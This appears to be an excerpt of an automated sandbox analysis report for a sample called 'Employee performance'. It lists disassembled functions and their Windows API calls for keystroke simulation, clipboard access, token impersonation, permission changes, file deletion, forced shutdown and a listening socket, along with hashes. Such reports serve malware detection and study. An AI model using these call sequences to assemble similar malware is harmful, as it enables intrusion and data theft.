GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00FEF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0102F474
IsIconic.USER32(00000000), ref: 0102F47D
ShowWindow.USER32(00000000,00000009), ref: 0102F48A
SetForegroundWindow.USER32(00000000), ref: 0102F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0102F4AA
GetCurrentThreadId.KERNEL32 ref: 0102F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0102F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0102F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0102F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0102F4DE
SetForegroundWindow.USER32(00000000), ref: 0102F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0102F4F6
keybd_event.USER32(00000012,00000000), ref: 0102F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0102F50B
keybd_event.USER32(00000012,00000000), ref: 0102F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0102F519
keybd_event.USER32(00000012,00000000), ref: 0102F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0102F528
keybd_event.USER32(00000012,00000000), ref: 0102F52D
SetForegroundWindow.USER32(00000000), ref: 0102F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0102F557

Strings

Shell_TrayWnd, xrefs: 0102F46F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 9dfd5b79de74c415b44c299c254640a8633fa5de87b095c9fe1564f5b2e1e952
Instruction ID: 096a6e357637c802f38b52a7af85cca28bd3472e33fbe5221648045364ae3665
Opcode Fuzzy Hash: 9dfd5b79de74c415b44c299c254640a8633fa5de87b095c9fe1564f5b2e1e952
Instruction Fuzzy Hash: 26316371A40228BBFB316BB55D4AFBF7EBCEB48B50F100056F681E61D1C6B65940AB60

Function 01031201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 010316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0103170D
Part of subcall function 010316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0103173A
Part of subcall function 010316C3: GetLastError.KERNEL32 ref: 0103174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 01031286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 010312A8
CloseHandle.KERNEL32(?), ref: 010312B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 010312D1
GetProcessWindowStation.USER32 ref: 010312EA
SetProcessWindowStation.USER32(00000000), ref: 010312F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 01031310

Part of subcall function 010310BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,010311FC), ref: 010310D4
Part of subcall function 010310BF: CloseHandle.KERNEL32(?,?,010311FC), ref: 010310E9

Strings

, xrefs: 0103125A
default, xrefs: 0103130B
winsta0, xrefs: 010312CC

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: effc7c7d43900acdf56ed47bb40281631c28c5b2032ba3118172c611f4674222
Instruction ID: 2609fc78dde7f0251200bb50a70782f0b8686f62661bd66ae53c4ac1f914204d
Opcode Fuzzy Hash: effc7c7d43900acdf56ed47bb40281631c28c5b2032ba3118172c611f4674222
Instruction Fuzzy Hash: 24819F71900309AFEF219FA9DD49BEE7FBDEF48700F044159FA90A61A0CB799944CB20

Function 01030B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 010310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01031114
Part of subcall function 010310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,01030B9B,?,?,?), ref: 01031120
Part of subcall function 010310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01030B9B,?,?,?), ref: 0103112F
Part of subcall function 010310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01030B9B,?,?,?), ref: 01031136
Part of subcall function 010310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0103114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01030BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01030C00
GetLengthSid.ADVAPI32(?), ref: 01030C17
GetAce.ADVAPI32(?,00000000,?), ref: 01030C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 01030C6D
GetLengthSid.ADVAPI32(?), ref: 01030C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 01030C8C
HeapAlloc.KERNEL32(00000000), ref: 01030C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 01030CB4
CopySid.ADVAPI32(00000000), ref: 01030CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01030CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01030D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 01030D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01030D45
HeapFree.KERNEL32(00000000), ref: 01030D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01030D55
HeapFree.KERNEL32(00000000), ref: 01030D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01030D65
HeapFree.KERNEL32(00000000), ref: 01030D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 01030D78
HeapFree.KERNEL32(00000000), ref: 01030D7F

Part of subcall function 01031193: GetProcessHeap.KERNEL32(00000008,01030BB1,?,00000000,?,01030BB1,?), ref: 010311A1
Part of subcall function 01031193: HeapAlloc.KERNEL32(00000000,?,00000000,?,01030BB1,?), ref: 010311A8
Part of subcall function 01031193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,01030BB1,?), ref: 010311B7

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: f191ae0be6679eaf95594140cd64876761de90e14391edd78a59a53da82e9900
Instruction ID: 7632634019419939cc80d93b6df0b354d9cc76cb34c90178d721eb90b6b9ebb8
Opcode Fuzzy Hash: f191ae0be6679eaf95594140cd64876761de90e14391edd78a59a53da82e9900
Instruction Fuzzy Hash: CF719D7590120AABEF20EFA8DD48BEEBBFCBF45300F044195FA94A6194D775A905CB60

Function 0104EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0106CC08), ref: 0104EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0104EB37
GetClipboardData.USER32(0000000D), ref: 0104EB43
CloseClipboard.USER32 ref: 0104EB4F
GlobalLock.KERNEL32(00000000), ref: 0104EB87
CloseClipboard.USER32 ref: 0104EB91
GlobalUnlock.KERNEL32(00000000,00000000), ref: 0104EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0104EBC9
GetClipboardData.USER32(00000001), ref: 0104EBD1
GlobalLock.KERNEL32(00000000), ref: 0104EBE2
GlobalUnlock.KERNEL32(00000000,?), ref: 0104EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0104EC38
GetClipboardData.USER32(0000000F), ref: 0104EC44
GlobalLock.KERNEL32(00000000), ref: 0104EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0104EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0104EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0104ECD2
GlobalUnlock.KERNEL32(00000000,?,?), ref: 0104ECF3
CountClipboardFormats.USER32 ref: 0104ED14
CloseClipboard.USER32 ref: 0104ED59

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: af356c85b48413c976a48fa90e705547dd5df30db7f98e805ecb1a454da7077f
Instruction ID: dc144dbfdbe9f37e9a226ad207f2f95fd2f0d7d0f292ce05aa7a27932d7e13a5
Opcode Fuzzy Hash: af356c85b48413c976a48fa90e705547dd5df30db7f98e805ecb1a454da7077f
Instruction Fuzzy Hash: BF61E7742043019FE310EF68D984F6A7BE5BF88704F08456EF5D6872A5CB79E905CBA2

Function 0104698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 010469BE
FindClose.KERNEL32(00000000), ref: 01046A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 01046A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 01046A75

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 01046AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 01046ADF

Strings

%4d, xrefs: 01046BB1
%4d%02d%02d%02d%02d%02d, xrefs: 01046B6A
%4d%02d%02d%02d%02d%02d%03d, xrefs: 01046B32
%02d, xrefs: 01046C00, 01046C0A, 01046C5A, 01046CAA, 01046CFA, 01046D4A
%03d, xrefs: 01046DA2

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: d2897cdda3c0a8ed2d6f077d6997730080498010f80e12a23759c15c75b9832f
Instruction ID: c2462a4eba1ff1fe58e52217705736c6a41ae610ff6f0fb6f58c86b3779731f6
Opcode Fuzzy Hash: d2897cdda3c0a8ed2d6f077d6997730080498010f80e12a23759c15c75b9832f
Instruction Fuzzy Hash: 56D182B1508301AFD310EBA4CC91EABB7EDAF88704F44491EF585C7291EB79DA44DB62

Function 01049642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 01049663
GetFileAttributesW.KERNEL32(?), ref: 010496A1
SetFileAttributesW.KERNEL32(?,?), ref: 010496BB
FindNextFileW.KERNEL32(00000000,?), ref: 010496D3
FindClose.KERNEL32(00000000), ref: 010496DE
FindFirstFileW.KERNEL32(*.*,?), ref: 010496FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0104974A
SetCurrentDirectoryW.KERNEL32(01096B7C), ref: 01049768
FindNextFileW.KERNEL32(00000000,00000010), ref: 01049772
FindClose.KERNEL32(00000000), ref: 0104977F
FindClose.KERNEL32(00000000), ref: 0104978F

Strings

*.*, xrefs: 010496F5

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: e7db8a943ca896582cc0f0f290626e527696af3a06519484add0e040ee69e412
Instruction ID: 112e0817df21845b71b3b9eac424a0878e539b204562aa302986fcf9e0a82482
Opcode Fuzzy Hash: e7db8a943ca896582cc0f0f290626e527696af3a06519484add0e040ee69e412
Instruction Fuzzy Hash: 2231B6715006196BEF24EEB9DD48ADF77ECAF4D224F0041B5EAD5E20A0D735D9408B14

Function 0104979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 010497BE
FindNextFileW.KERNEL32(00000000,?), ref: 01049819
FindClose.KERNEL32(00000000), ref: 01049824
FindFirstFileW.KERNEL32(*.*,?), ref: 01049840
SetCurrentDirectoryW.KERNEL32(?), ref: 01049890
SetCurrentDirectoryW.KERNEL32(01096B7C), ref: 010498AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 010498B8
FindClose.KERNEL32(00000000), ref: 010498C5
FindClose.KERNEL32(00000000), ref: 010498D5

Part of subcall function 0103DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0103DB00

Strings

*.*, xrefs: 0104983B

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 300fffc29bf62bb474ec6c112401c5cb9edea566bc8f60dde96dd2bf2f37406f
Instruction ID: 8ea3abe6c2c480cb9199e4cb4a518c3476eecbab5eb55209a7902f1bb266969a
Opcode Fuzzy Hash: 300fffc29bf62bb474ec6c112401c5cb9edea566bc8f60dde96dd2bf2f37406f
Instruction Fuzzy Hash: B831C971500619ABFF20EEBDDC849DF77AC9F49224F1041B9E9D4A2090D735D9458B20

Function 01048195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 01048257
SystemTimeToFileTime.KERNEL32(?,?), ref: 01048267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01048273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01048310
SetCurrentDirectoryW.KERNEL32(?), ref: 01048324
SetCurrentDirectoryW.KERNEL32(?), ref: 01048356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0104838C
SetCurrentDirectoryW.KERNEL32(?), ref: 01048395

Strings

*.*, xrefs: 0104839B

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 50c228fe0ce6fb6d992c7b7460577c18d8f9591c53aa6803462a05983567cf86
Instruction ID: 89c388f2d129912c32cfb226af37599b023e3ba6269f36bcfb1e4eb5fddcac56
Opcode Fuzzy Hash: 50c228fe0ce6fb6d992c7b7460577c18d8f9591c53aa6803462a05983567cf86
Instruction Fuzzy Hash: D9616BB25043059FD710EF64C8849AEB3E9FF89310F08896EF9C997261DB35E945CB92

Function 0103D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD3A97,?,?,00FD2E7F,?,?,?,00000000), ref: 00FD3AC2

Part of subcall function 0103E199: GetFileAttributesW.KERNEL32(?,0103CF95), ref: 0103E19A

FindFirstFileW.KERNEL32(?,?), ref: 0103D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0103D1DD
MoveFileW.KERNEL32(?,?), ref: 0103D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0103D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0103D237

Part of subcall function 0103D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0103D21C,?,?), ref: 0103D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0103D253
FindClose.KERNEL32(00000000), ref: 0103D264

Strings

\*.*, xrefs: 0103D0CD, 0103D0D6, 0103D0EB

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: b34dc27b3d8c0b190049897ee193e3ee4390024ece62ea5156013a2ca5faf892
Instruction ID: cb7a299331571eeeea31f0c4053f359cb4add79073c826cd9ce061643095210b
Opcode Fuzzy Hash: b34dc27b3d8c0b190049897ee193e3ee4390024ece62ea5156013a2ca5faf892
Instruction Fuzzy Hash: 5261BF31D0510DABCF05EBE0DE929EDB7BAAF51300F6841A6E48173291EB359F09DB61

Function 0104ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0104ED91
EmptyClipboard.USER32 ref: 0104ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0104EDAC
CloseClipboard.USER32 ref: 0104EEA3

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: acc108c61bb502c0bc0e3cfc348f11cc846743caf7719085ecf126eaceb278a1
Instruction ID: babc42bac95da38c92b3c6a7831d4689abbd8c5e7e65a190700bbaa6f69c7313
Opcode Fuzzy Hash: acc108c61bb502c0bc0e3cfc348f11cc846743caf7719085ecf126eaceb278a1
Instruction Fuzzy Hash: F4418D75204611AFE721DF19D488B19BBE5FF48318F04C0A9E89A8B662C77AFC41CB90

Function 0103E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 010316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0103170D
Part of subcall function 010316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0103173A
Part of subcall function 010316C3: GetLastError.KERNEL32 ref: 0103174A

ExitWindowsEx.USER32(?,00000000), ref: 0103E932

Strings

SeShutdownPrivilege, xrefs: 0103E902
@, xrefs: 0103E925
, xrefs: 0103E95C
, xrefs: 0103E920

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: c697a9bc40abe1edfb24679dc2e8d04462e1e722006086ddf00d1c9cf9cfc56e
Instruction ID: 80ebed5fcc2eead0c79f8891104191edd3015d95d09cba3b71592ab51d7080a8
Opcode Fuzzy Hash: c697a9bc40abe1edfb24679dc2e8d04462e1e722006086ddf00d1c9cf9cfc56e
Instruction Fuzzy Hash: BE01D672610211ABFB6426B8DD85BFF729C9798750F054A23FDC2E21D1D5A55C4083A0

Function 01051204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 01051276
WSAGetLastError.WSOCK32 ref: 01051283
bind.WSOCK32(00000000,?,00000010), ref: 010512BA
WSAGetLastError.WSOCK32 ref: 010512C5
closesocket.WSOCK32(00000000), ref: 010512F4
listen.WSOCK32(00000000,00000005), ref: 01051303
WSAGetLastError.WSOCK32 ref: 0105130D
closesocket.WSOCK32(00000000), ref: 0105133C

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: cae4d2e9538f350e8f9fdc23fdcb886fddb3963f877289bc5ed0b1689bee2ed5
Instruction ID: 6bd6cf47d1d41ae6da3d8f58b29fcfd5446e1f2e5a536ac13f0bd75c587de4d4
Opcode Fuzzy Hash: cae4d2e9538f350e8f9fdc23fdcb886fddb3963f877289bc5ed0b1689bee2ed5
Instruction Fuzzy Hash: 9B41A5716001019FE760DF28C584B2ABBE6BF46314F188189D9968F397C775ED81CBE1

Function 0100B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0100B9D4
_free.LIBCMT ref: 0100B9F8
_free.LIBCMT ref: 0100BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01073700), ref: 0100BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,010A121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0100BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,010A1270,000000FF,?,0000003F,00000000,?), ref: 0100BC36
_free.LIBCMT ref: 0100BD4B

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 7b5139833163493feed60b8a910a388c17f95b1bb1baf47b7da3f8fa160e4af8
Instruction ID: bc632d49a6864561bf1d4136d3285093211b28cd03e73c0ed7e9ea0bf3e9c95a
Opcode Fuzzy Hash: 7b5139833163493feed60b8a910a388c17f95b1bb1baf47b7da3f8fa160e4af8
